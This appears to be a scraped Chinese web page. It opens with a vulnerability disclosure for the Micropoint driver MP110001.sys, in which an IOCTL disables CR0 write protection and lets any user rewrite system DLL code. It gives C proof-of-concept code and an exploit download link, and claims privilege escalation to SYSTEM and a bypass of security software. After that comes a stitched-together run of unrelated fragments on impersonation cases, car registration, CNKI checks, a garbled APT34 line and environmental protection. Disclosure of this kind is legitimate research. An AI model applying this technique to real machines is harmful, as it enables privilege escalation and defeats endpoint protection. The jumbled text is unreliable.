微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。 其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。 出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505该驱动提供了一个接口,允许RING3程序将一块数据COPY到地址0-0x80000000的任意 地址,在写入时会将寄存器CR0的第16位置0,此时CPU的页保护机制就会失效,WINDOWS NT 的CopyOnWrite机制也将失效,RING3程序可以将内存写入到系统模块,例如kernel32.dll, user32.dll的地址,改写它们的代码,此时对系统DLL代码的改写会在所有进程体内同时生效. 通过这一接口,任何权限的RING3程序就可以HOOK或旁路系统任何进程的函数调用,从而进行权限提升,如果HOOK进主动防御、防火墙等的进程体内,则可绕过主动防御软件的保护。 测试代码:HANDLE hdev = CreateFile("\\\\.\\MP110001" ,FILE_READ_ATTRIBUTES ,FILE_SHARE_READ |FILE_SHARE_WRITE ,0,OPEN_EXISTING ,0,0); if (hdev == INVALID_HANDLE_VALUE){ CHAR xx[100];sprintf(xx , "create err = %u\n" , GetLastError());MessageBox(xx, 0 , 0 );return ;} CHAR xx[] = "hello mp!"; HMODULE p = GetModuleHandle("ntdll.dll"); ULONG btr ; BOOL bret = DeviceIoControl(hdev ,0x220007,(PVOID)((ULONG)p + 2 ),strlen(xx)+1 ,xx,0,&btr ,0); CloseHandle(hdev); 测试代码会向NTDLL.DLL的DOS头第二个字节开始写入一个字符串“hello mp",此修改将在系统任何进程体内生效,可使用OD、WINDBG,WINHEX等工具查看 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下LOCALexp_MP.rar
冒名恶性事件在日常生活中常常产生,有代替别人工作的,也是有代替别人读大学的,那样针对被代替者而言是十分不合理的,并且很有可能还会继续危害他人的一生,前不久山东省依法查处了几起冒名恶性事件,大伙儿见到后...
最开始,你需要准备充分这类原料:身份证、汽车合格证、汽车购置税、保险单和买发票。这类原料绝大多数都是汽车专卖店准备充分的,因而 你只务必带上你的身份证。 在准许整个过程中,新车到达车管所后,最...
荆棘是现在常用的一个词语,它原来是指两种植物:荆和棘。荆现名牡荆,是马鞭草科的一种落叶灌木。 古代又名楚,用来做刑仗,鞭打犯人。因此楚又称“荆楚”,受鞭打叫“受楚”。“受楚”是件痛苦的事,所...
cnki是什么(知网cnki查重区别是什么吗)很多人在人进行论文查重的时候会问PaperRater和知网cnki查重区别是什么? 一、数据库不同。 中国知网cnki:中国学术期刊网络出版...
每日好文 本文将对APT34远控组件Glimpse新版木马进行技能剖析。在. htaccess中的写入如下:(6)冗余传输安全的新方案可以有用统筹低时延事...
我国环保事业起步于上世纪七十年代,第一批建成并运营的城市污水处理工程在北京,沈阳,长沙三市。经过数十年发展,已经获得长足的进步。特别自本世纪开始,全国环保事业的发展可以用突飞猛进来形容,形成政府,国企...